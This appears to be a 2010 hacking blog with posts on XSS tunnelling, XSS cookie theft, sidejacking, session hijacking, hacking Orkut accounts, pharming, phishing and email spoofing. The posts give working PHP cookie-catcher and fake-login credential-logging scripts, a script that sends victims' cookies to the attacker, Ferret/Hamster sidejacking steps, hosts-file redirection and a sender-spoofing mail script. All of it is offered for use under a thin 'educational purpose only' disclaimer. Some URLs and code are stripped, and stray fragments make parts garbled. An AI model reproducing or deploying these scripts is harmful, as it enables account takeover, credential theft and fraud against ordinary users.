Friday, December 31, 2010


  • What is XSS Tunnelling?
XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies. XSS Tunnel is a standard HTTP proxy which sits on an attacker’s system. Any tool that is configured to use it will tunnel its traffic through the active XSS Channel on the XSS Shell server. The XSS Tunnel converts the request and responds transparently to validate the HTTP responses and XSS Shell requests.

  • XSS Channel:
An XSS Channel is an interactive communication channel between two systems
which is opened by an XSS attack. At a technical level, it is a type of AJAX
application which can obtain commands, send responses back and is able to talk

  • XSS Shell:
The XSS Shell is a tool that can be used to setup an XSS Channel between a victim
and an attacker so that an attacker to control a victim’s browser by sending it
commands. This communication is bi-directional.

Download XSS Shell from here.

  • Example:
To get the XSS Shell to work an attacker needs to inject the XSS Shell’s JavaScript
reference by way of an XSS attack. The attacker is then able to control the victim’s
browser. After this point the attacker can see requests, responses and is able to
instruct the victim’s browser to carryout requests etc."><script

  • How Does XSS Shell Work?
Firstly, the server side part of the XSS Shell coordinates the XSS Shell between an
attacker and the victim. It is a server-side application and requires an ASP and IIS
web server. It uses an MS Access database as storage.

The second part of the tool is client-side and written in JavaScript. This loads in the
victim’s browser and is responsible for the receiving and processing of commands
together with providing the channel between the victim and the attacker. This code
was tested under Firefox, IE6 and IE7.

The final part of the XSS Shell is the administration interface. An attacker can send
new commands and receive the responses from a victim(s) browser instantly from
this interface. Again it is ASP and requires IIS.

1. An attacker infects a website with a persistent or reflected (temporary) XSS
attack which calls remote XSS Shell JavaScript.

2. The Victim follows a link or visits the page and executes the JavaScript within
that domain.

3. The Victim’s browser begins to perform periodic requests to the XSS Shell
Server and looks for new commands.

4. When the victim browser receives a new command such as (Get Cookies,
Execute custom JavaScript, Get Key logger Data etc.) it is processed and
returns the results to the XSS Shell.

5. The Attacker can push new commands to victim(s) browser and view the
results from the XSS Shell administration interface.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Tuesday, December 7, 2010


  • What is Cross-Site Scripting ?
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. The malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site.

  • Techniques :
Basically Cross Site Scripting is taking advantage of web application that takes user input but do not filter it properly. It allows an attacker to inject things like HTML or other java scripts or some malicious codes, basically these codes or scripts used to steal the information of the user and mostly its used to steal the cookies.

These cookies are used to maintain the user authentication on that particular website. So the basic idea is if an attacker can manage to get the cookies of a particular user than he may easily login to their account.

There are basically three types of XSS attacks:

1. Persistant XSS:

Persistant or Stored or Type-I XSS occurs when the data provided by the attacker is saved by the server, and then permanently displayed on normal pages returned to other users in the course of regular browsing, without proper HTML escaping.

Vulnerability Testing:

Lets login as an User in a particular forum or some discussion board. Once you are logged in create a new thread name it as anything but in the body of the thread lets put:

Script Code:


If you get any alert popping-up which says test, then you have got the site which is Persistant Attack Vulnerable.

Now the attacker will use a Cookie Catcher in order to steal the user's session cookie. Cookie catcher is basically a PHP file which can store information directly sent to it from a browser.

Script Code:

$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
header ("Location:");

Upload this script to a PHP supported web hosting site like ripway or t35 or

And now we will need to change the script which needs to put in a new thread so cookie is sent accross to the cookie catcher.

Script Code:

<script>document.location="" + document.cookies</script>

Post this in the body of your thread. Now if someone clicks on the thread, their cookies would be sent to you as a text format and the user will be redirected to

2. Non-persistant XSS:

The Non-persistent or Reflected or Type-II XSS vulnerability is by far the most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request.

Many web portals offer a personalized view of a web site and may greet a logged in user as Welcome, Joe. Sometimes the data referencing a logged in user is stored within the query string of a URL: http://portal.example/index.php sessionid=12312312&username=Joe. If an attacker were to modify the username field in the URL, inserting a cookie-stealing JavaScript, it would possible to gain control of the user's account if they managed to get the victim to visit their URL. Most of the time an attacker will URL Encode their malicious payload by ASCII-HEX converter similar to the example below:

Encoded URL:


Decoded this by HEX-ASCII converter you will find Cookie Stealing URL:

Decoded URL:


3. DOM Based XSS:

In 2005, Amit Klein defined a third type of XSS, which he coined DOM Based or Type-0 XSS. DOM-based XSS is an advanced type of XSS attack which is made possible when the web application’s client side scripts write user provided data to the Document Object Model (DOM). The data is subsequently read from the DOM by the web application and outputted to the browser. If the data is incorrectly handled, an attacker can inject a payload, which will be stored as part of the DOM and executed when the data is read back from the DOM.

The most dangerous part of DOM-based XSS is that the attack is often a client-side attack, and the attacker’s payload is never sent to the server. This makes it even more difficult to detect for Web Application Firewalls (WAFs) and security engineers analyzing the server’s logs since they will never even see the attack.

Among various objects that make up the DOM, there are some objects in particular which an attacker can manipulate in order to generate the XSS condition. Such objects include the URL (document.URL), the part of the URL behind the hash (location.hash) and the Referrer (document.referrer).

  • Protection :
1. The primary defense mechanism to stop XSS is contextual output encoding or escaping.

2. Untrusted HTML input must be run through an HTML policy engine to ensure that is does not contain XSS. Tools such as OWASP AntiSamy and accomplish this task.

3. Besides content filtering, additional security on cookie-based user authentication should be introduced.

4. XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS) by submitting your HTML forms and substituting the form value with strings that are representative of an XSS attack.

5. Acunetix Web Vulnerability Scanner (WVS) Free Edition offers the functionality for anyone who wants to test their own application for Cross Site Scripting.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...


  • What is Sidejacking ?
Sidejacking is the process of sniffing cookie information, then replaying them against websites in order to clone a victim’s session. We use the term sidejacking to distinguish this technique from man-in-the-middle hijacking. Whereas man-in-the-middle hijacking interferes with the original session, sidejacking does not. The victim continues to use his session blissfully unaware that we are also in his account.

SideJacking works only if the site catches a non-SSL cookie, so any Web site that uses SSL exclusively would be safe from SideJackers. SideJacking was first demonstrated by Robert Graham, CEO of Errata Security at Black Hat in 2007.

  • Techniques :
All you need to do in order to sidejack is sniff cookies off the wire and edit cookies. This can be done with a wide variety of tools.

1. WinPcap is the industry-standard tool for link-layer network access in Windows environments: it allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine and support for remote packet capture.

Download and install Winpcap from here.

2. Graham leveraged the tools Ferret, essentially a packet sniffing tool that captures cookies and writes them to a hamster.txt file, and Hamster, basically a local proxy that creates a web front end for exploiting the cookie information captured by Ferret.

Download and install Ferret & Hamster from here.

3. Unzip the tools into a directory such as C:\sidejacking.

4. Open a command prompt and change to that directory as cd c:\sidejacking.

5. Use ferret –W to figure out which interface you want to sniff.

6. Use ferret –i n to start sniffing cookies. Here n is the interface number.

7. Now use hamster in the same directory as hamster.txt to start the proxy.

8. Set up a browser to use the proxy at

9. In that browser, go to http://hamster to go to the proxy console window.

10. Select a victim, then click on a URL to sidejack it.

  • Countermeasures :
1. Always try to stick to secured WiFi networks that you know and trust that would not have any strangers on it running packet sniffers.

2. Never use a Wi-Fi hotspot unless they are using VPN (virtual private networking) or SSL (secure sockets layer) to access sensitive information.

3. Graham said that Google Mail users could switch to and secure their session from such snooping.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...


  • What is Session Fixation ?
Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. When authenticating a user, it doesn’t assign a new session ID, making it possible to use an existent session ID.

The attack consists of inducing a user to authenticate himself with a known session ID, and then hijacking the user-validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.

  • Attack Scenario :
1. Mallory has determined that http://unsafe/ accepts any session identifier, accepts session identifiers from query strings and has no security validation. http://unsafe/ is thus not secure.

2. Mallory sends Alice an e-mail: "Hey, check this out, there is a cool new account summary feature on our bank, http://unsafe/?SID=I_WILL_KNOW_THE_SID". Mallory is trying to fixate the SID to I_WILL_KNOW_THE_SID.

3. Alice is interested and visits http://unsafe/?SID=I_WILL_KNOW_THE_SID. The usual log-on screen pops up, and Alice logs on.

4. Mallory visits http://unsafe/?SID=I_WILL_KNOW_THE_SID and now has unlimited access to Alice's account.

  • Attack Process :
1. Session Setup:

First, the attacker either sets up a trap session on the target server and obtains that session’s ID, or selects a arbitrary session ID to be used in the attack. In some cases, the established trap session needs to be maintained by repeatedly sending requests referencing it to avoid idle session timeout.

2. Session Fixation:

Next, the attacker needs to introduce her session ID to the user’s browser, thereby fixing his session.

3. Session Entrance:

Finally, the attacker has to wait until the user logs in to the target server using the previously fixed session ID and then enter the user’s session.

  • Attack Example :
1. First, the attacker, who in this case is also a legitimate user of the system, logs in to the server and is issued a session ID 1234.

2. Then he sends a hyperlink http://online.worldbank.dom/login.jsp?sessionid=1234 to the user, trying to lure him into clicking on it.

3. The user clicks on the link, which opens the server’s login page in his browser.

4. Upon receipt of the request for login.jsp?sessionid=1234, the web application has established.

5. Finally, the user provides his credentials to the login script and the server grants him access to his bank account.

6. At this point, knowing the session ID, the attacker can also access the user’s account via account.jsp?sessionid=1234.

  • Countermeasures :
1. Web applications must ignore any session ID provided by the user’s browser at login and must always generate a new session to which the user will log in if successfully authenticated.

2. If possible, a web application on a strict system should only issue session IDs of newly generated sessions to users after they have successfully authenticated.

3. Session identifiers in URL (GET or POST variables) are not recommended as they simplify this attack. The session identifier on most modern systems is stored by default in an HTTP cookie, which has a moderate level of security. Use of the SSL/TLS session identifier is very secure.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...


  • What is Session Hijacking ?
Session hijacking is the act of taking control of a user session after successfully obtaining or generating an authentication session ID. Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress.

TCP session hijacking is when a hacker takes over a TCP session between two machines. Since most authentication only occurs at the start of a TCP session, this allows the hacker to gain access to a machine.

  • Techniques :
There are mainly three methods used to perpetrate a session hijack. These are:

1. Session Fixation:

The session fixation attack is a class of Session Hijacking, which steals the established session between the client and the Web Server after the user logs in. Instead, the Session Fixation attack fixes an established session on the victim's browser, so the attack starts before the user logs in.

For detailed info on How Session Fixation works click here.

2. Session Sidejacking:

where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client.

1. First the attacker uses a network sniffer to capture a valid token session called Session ID.

2. Now he manipulates the token session to gain unauthorized access to the Web Server or hijack the victim's web session.

For detailed info on How Session Sidejacking works click here.

3. Cross-Site Scripting:

The attacker can compromise the session token by using malicious code or programs running at the client-side. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker. The example shows how the attacker could use an XSS attack to steal the session token.

For detailed info on How XSS works click here.

  • Protection :
1. Regenerating the session id after a successful login. This prevents session fixation because the attacker does not know the session id of the user after he has logged in.

2. Some services make secondary checks against the identity of the user. For example it will change the value of the cookie with each and every request.

3. Users may also wish to log out of websites whenever they are finished using them.

4. Encryption of the data passed between the parties; in particular the session key. This technique is widely relied-upon by web-based banks and other e-commerce services.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Saturday, December 4, 2010


  • How To Hack Orkut ?

Hello guys ! Most of you want to know the way to hack Orkut account. Today I'll discuss on this topic. But before this you should know the fact that Google uses a 4 Level Orkut login which makes it difficult to hack using brute force method.

1st Level: SSL or 128 bit secured connection.
2nd Level: Google account checks for cookie in the sytem of user.
3rd Level: Google provides a redirection to the entered User information.
4th Level: Google doesn't use conventional php or aspx or asp coding so impossible to attack using input validation attack.

So it is not an easy task to hack Orkut by breaking this security. However still some people manages to get access to other’s Orkut accounts. Now the question is how they do this.

  • Techniques :


Using Keyloggers is one of the Easiest Way to Hack Orkut password. Keylogger programs can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden.

Key logger software can record instant messages, e-mail and any information you type at any time on your keyboard. The log file created by the key logger can then be saved to a specific location or mailed to the concerned person.

For detailed info on How to use a Keylogger click here.


Phishing Attack is the most popular way of stealing other’s password. This attact works by using fake login pages to fool innocent Orkut users to enter their Orkut username and password in these fake login pages instead of the real ones.

When the users land on these page they enter their Orkut username and password thinking it to be the real page but actually it is other way round. It submits all the entered details to the creator of the fake login page.

You get a link to a community in a scrap. It may be something like:

It is okrut instead of orkut. This is definitely a trap created by the hacker to hack your Orkut password.

For detailed info on How Phishing Works click here.


In computer science, session hijacking refers to the exploitation of a valid computer session, sometimes also called a session key, to gain unauthorized access to information or services in a computer system.

To steal one's Session, the attacker generally use a network sniffer or a cookie catcher. You must have seen the circulating scraps or flooding scraps that asks you to paste a Java Script in your address bar. Well sometimes such script may reveal your private information.

For detailed info on How Session Hijacking Works click here.

  • Protect Your Orkut Account :

1. Never try to login your Orkut account from sites other than

2. Never click on any links from the sources you don’t trust while accessing your Orkut account.

3. Never ever use Javascripts on Orkut, no matter whatever it claims to do.

4. Never tick the box Remember Me on the orkut homepage if you are surfing from a cafe or a public area.

5. McAfee SiteAdvisor is a service that reports on the safety of web sites by alerting users to possible phishing and identity theft scams.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Thursday, December 2, 2010


  • What is Pharming ?
You must be well aware of phishing and its potential to cause damage. In phisihing you are being spammed with malicious deceiving e-mail requests for you to visit spoof Web sites which appear legitimate.

Pharming on the other hand poisons a DNS server by infusing false information into the DNS server, resulting in a user’s request being redirected elsewhere. Your browser, however will show you are at the correct Web site, which makes pharming a bit more serious and more difficult to detect.

Pharming is a derivate from phishing. Both use “ph” instead of an “f” and are part of a computer slang.

  • What is DNS :
The Domain Name System (DNS) is a hierarchical naming system, which translates human-friendly computer hostnames into IP addresses. For example, translates to

  • DNS Poisoning :
Pharming attacks do not take advantage of any new technique. They use the well known DNS cache poisoning, domain spoofing and domain hijacking techniques that have been around for quite long.

1. The hacker hacks into the DNS server and changes the IP address for He put the IP of (Hacker’s site).

2. User wants to go the website and types the address in the web browser.

3. User’s computer queries the DNS server for the IP address of

4. Since the DNS server has already been poisoned by the attacker, it returns the IP address of to the user’s computer.

5. The user has now been fooled into visiting the fake website controlled by the attacker rather than the original website.

  • Host Redirection :
The hosts file is a computer file used in an operating system to map hostnames to IP addresses. The hosts file is a plain-text file and is traditionally named hosts.

Location: %SystemRoot%\system32\drivers\etc\

Add an entry at the bottom where it says : localhost

What it will do is redirect the person from myspace website to ip which is the ip for

Thus the attacker can manipulate the IP and take the victim towards any fake website.

  • Prevent Pharming :
1. Pharming Conscious web sites that use forms to accept passwords or other sensitive information ensure that the page that contains the form itself is served using HTTPS.

2. If you visit an SSL-enabled website, look out for this warning message window. If you get it, doubly check if the website you are visiting gave this message in earlier instances. Check if the URL is the same that you intend to go to.

3. SpoofStick is a simple browser extension that helps users detect fake websites. This tool is free and installs itself into your browser. It’s available for firefox and internet explorer. For more information go to Spoofstick.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...


  • What is Phishing ?
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.

  • Phishing E-mail :
Phishing is typically carried out by e-mail or instant messaging. Phishing e-mail messages take a number of forms:

1. They might appear to come from your bank or financial institution, a company you regularly do business with, such as Microsoft, or from your social networking site.

2. Spear phishing is a targeted form of phishing in which an e-mail message might look like it comes from your employer, or from a colleague who might send an e-mail message to everyone in the company, such as the head of human resources or IT.

3. Phone phishing scams direct you to call a customer support phone number. A person or an audio response unit waits to take your account number, personal identification number, password, or other valuable personal data.

Here is an example of what a phishing scam in an e-mail message might look like.

  • Phishing Techniques :
1. Link Manipulation:

Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL

Another method of spoofing used links like: actually this URL points to the facebook (i.e. fake login page ) section of the ripway website.

2. Filter Evasion:

Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails.

  • Fake Login Page :
Fake Login Page exactly looks like the original page of any website. But in the page source, the action field is replaced by a PHP script. This PHP serves two purposes:

Script Code:

header ('Location: ');
$handler = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handler, $variable);
fwrite($handler, "=");
fwrite($handler, $value);
fwrite($handler, "\r\n");
fwrite($handler, "\r\n");

1. First it captures the input data (username & password) and sends it to the attacker.

2. It redirects the victim to the original page to make him believe that the login is normal.

  • Phishing Targets :
1. Social networking sites like facebook, myspace, orkut now a prime target of phishing, since the personal details in such sites can be used in identity theft.

2. The RapidShare file sharing site has been targeted by phishing to obtain a premium account.

3. Almost half of phishing thefts in 2006 were committed by groups operating through the Russian Business Network based in St. Petersburg.

4. eBay, PayPal and the other online banks are also targeted.

  • Anti Phishing Info :
1. Never assume that an email is valid based on the sender’s email address. The email may be forged.

2. A trusted bank such as CITIBANK will never ask you for your full name and password in a CITIBANK email.

3. An email from trusted organization will never contain attachments or software.

4. Always ensure that you're using a secure website when submitting credit card or other sensitive information.

5. Get in the habit of looking at the address line. Were you directed to PayPal? Or something different like

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Wednesday, December 1, 2010


  • What is E-mail Forging ?
E-mail forging is e-mail activity in which the sender address and other parts of the e-mail header are altered to appear as though the e-mail originated from a different source. It is commonly used in spam and phishing e-mails to hide the origin of the e-mail message.

Examples of spoofed email that could affect the security of your site include:

  • email claiming to be from a system administrator requesting users to change their passwords to a specified string and threatening to suspend their account if they do not do this.
  • email claiming to be from a person in authority requesting users to send them a copy of a password file or other sensitive information.
  • you can send an email to your friend with the following sender details: From: Bill Gates <>

  • Methods:
1. Using SMTP Server:

One can send Anonymous emails simply by installing an SMTP server in his system and using the TELNET commands:

This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoomail blocks the emails that are sent directly from a PC.

2. Using Email Script:

First we need to find a PHP supported web hosting providers like Ripway or Freewha or Usually they all are trusted and authorised.

Script Code:


$to = "";
$subject = "Test mail";
$message = "Hello! This is a simple email message.";
$from = "";
$headers = "From: $from";
echo "Mail Sent.";

Now upload the PHP script on that site and set the permission to 777. U are done...

  • Prevent Spam :
1. Use cryptographic signatures (e.g., PGP "Pretty Good Privacy" or other encryption technologies) to exchange authenticated email messages.

2. Similarly, sites may wish to consider enabling SSL/TLS in their mail transfer software. Using certificates in this manner increases the amount of authentication performed when sending mail.

3. Configure your mail delivery daemon to prevent someone from directly connecting to your SMTP port to send spoofed email to other sites.

4. Educate your users about your site's policies and procedures in order to prevent them from being "social engineered," or tricked, into disclosing sensitive information (such as passwords).

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...